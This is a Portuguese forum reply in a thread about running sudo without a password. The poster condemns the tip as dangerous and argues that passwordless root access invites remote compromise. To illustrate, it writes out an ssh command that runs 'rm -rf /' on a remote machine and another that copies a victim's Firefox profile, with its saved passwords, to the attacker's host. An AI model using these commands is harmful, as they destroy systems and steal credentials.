Fiquei abismado, e se a pessoa tiver um servidor ssh (basta dar o comando apt-get install sshd)?
O usuário pode nem saber que tem o servidor ssh ativo, basta ter seguido um dia, uma dica, em que deu esse comando.
Para acabar com o micro da pessoa basta digitar no seu computador o comando:
ssh root@ip "rm -rf /"Ele não permite que nos conectemos no micro sem senha por ssh, mas ele roda o comando la dentro sem questionar.
Ou seja, seguir essa dica cria uma brecha que permite de certa forma, autenticação ssh sem senha, como root, o porquê, não me aprofundei para saber, sei que ao tentar conexão ssh root@ip ele apenas pensa, mas ao rodar um comando, ele cai no shell e ao entrar no micro via ssh percebe-se que o comando foi executado la dentro.
O comando ssh root@ip "scp -r [firefox] root@meuip:/destino" traz os dados do firefox de outro micro para o meu micro e como todos sabem, o firefox agora permite que vizualizemos nossas senhas salvas e, uma pessoa prática como o geleka, salva a senha do e-mail, forum e outras coisas no firefox para não ter de digita-las todo dia. Resumindo, danou-se.
Para ser justo, vou testar e ver se o mesmo ocorre com a versão mais atual do ssh, pois utilizo nas estações outra versão, as estações finais são antigas apenas com o modo texto e apenas com o usuário root ativo. Provavelmente, o problema deve ocorrer, até por que não é uma falha do sistema, é uma falha do usuário.
Sei como fazer para deixar o root sem senha, o usuário do sistema sem senha, autenticação no samba sem senha, autenticação no squid sem senha, ssh sem senha e sem chave, eu posso simplesmente tirar todas as senha do meu sistema, posso liberar internet no celular de qualquer modelo sem qualquer tipo de autenticação, posso deixar até o meu e-mail do gmail sem senha. É pratico claro que é, não ter de digitar senha é muito prático, Mas não creio que seja util ensinar a como fazer isso, então, não posto. E se alguém perguntar em um tópico: Como conectar por vnc remotamente sem senha, eu não respondo e, se responder será algo do tipo: deixa de ser preguiçoso e escolha uma senha, seu fanfarrão.
Digamos que um gerente de banco lhe de cartões de debito e credito sem senha dizendo, basta passar no caixa e o dinheiro sai você aceitaria? Seria mais pratico, claro, você aceitaria? E se alguém divulgasse uma seqüência de teclas que, digitadas em um caixa eletrônico, retirasse a senha do cartão inserido, o fazendo funcionar sem senha, você acharia essa dica útil? Ou será que essa pessoa que posta a dica tem segundas intenções? Que deus lhe ajuda a nunca perder seu cartão, pois sua senha não valheria de nada, graças ao fulano que ensinou a como burlar a segurança do cartão e, nesse caso, o fulano é VOCÊ.
Então vamos lá, você já mostrou como diminuir a senha, agora ensinou a como fazer o sudo funcionar sem senha, então, o próximo passo do seu 'objetivo de praticidade' seria, deixe me ver, liberar o acesso remoto sem senha? Acertei? Considero seu post mais do que inútil, considero-o perigoso.
Essa é a pergunta que me vem a mente ao ler mais um tópico seu seguindo a mesma linha de raciocínio, seria o geleka ignorante (no sentido de não possuir o conhecimento necessário para postar uma dica) ou mal intencionado? Sinceramente, agora acho que você é mal intencionado.
Tópico: Sudo sem pedir a senha (Modo não seguro) (Lida 14586 vezes)